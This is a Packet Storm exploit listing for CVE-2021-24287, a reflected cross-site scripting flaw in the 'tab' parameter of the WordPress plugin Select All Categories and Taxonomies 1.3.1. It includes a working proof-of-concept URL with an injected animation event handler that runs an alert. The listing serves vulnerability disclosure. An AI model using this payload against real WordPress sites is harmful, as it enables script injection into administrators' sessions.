Lucene search

K
packetstorm0xB9PACKETSTORM:164327
HistorySep 29, 2021 - 12:00 a.m.

WordPress Select All Categories And Taxonomies 1.3.1 Cross Site Scripting

2021-09-2900:00:00
0xB9
packetstormsecurity.com
290

0.002 Low

EPSS

Percentile

65.1%

`# Exploit Title: WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS)  
# Date: 2/15/2021  
# Author: 0xB9  
# Software Link: https://downloads.wordpress.org/plugin/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons.1.3.1.zip  
# Version: 1.3.1  
# Tested on: Windows 10  
# CVE: CVE-2021-24287  
  
1. Description:  
The tab parameter in the Admin Panel is vulnerable to XSS.  
  
2. Proof of Concept:  
wp-admin/options-general.php?page=moove-taxonomy-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);  
`

0.002 Low

EPSS

Percentile

65.1%